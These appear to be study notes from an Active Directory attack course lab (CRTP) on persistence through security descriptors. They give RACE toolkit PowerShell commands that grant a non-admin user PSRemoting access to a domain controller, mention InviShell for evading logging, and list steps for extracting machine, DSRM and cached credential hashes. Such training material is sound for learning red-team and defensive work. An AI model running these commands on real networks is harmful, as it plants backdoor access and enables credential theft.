Security Descriptors

Security Descriptors

  • It is possible to modify SD like Owner, primary group, DACL, SACL of multiple remote access methods (securable objects) to allow access to non-admin users.

  • Admin privileges are required to modify SD.

  • ACLs can be modified to allow non-admin users access securable objects.

PowerShell Remoting:

Use RACE toolkit, either PSRemoting or WMI

  • Using PSRemoting

# Using PSRemoting
# Run InviShell
# First of all run (to import RACE Toolikit) -:
. C:\AD\Tools\RACE-master\RACE.ps1

# On local machine for student1, open elevated cmd:
# This reads the existing ACL for root namespace and DCOM and add an entry for our SID.
Set-RemotePSRemoting -SamAccountName student1 -Verbose

# On remote machine for student1 without credentials:
Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Verbose
# Connect to dcorp-dc as student
Enter-PSSession -ComputerName dcorp-dc

# To remove the permissions on remote machine:
Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Remove

  • Using WMI

Remote Registry:

  • Using RACE or DAMP, with admin privs on remote machine (Make sure to run this first) -:

  • As student1, retrieve machine account hash:

  • Retrieve local account hash: (DSRM Administrator)

  • Retrieve domain cached credentials:

PreviousCRTP Lab 12NextCRTP Lab 13

Last updated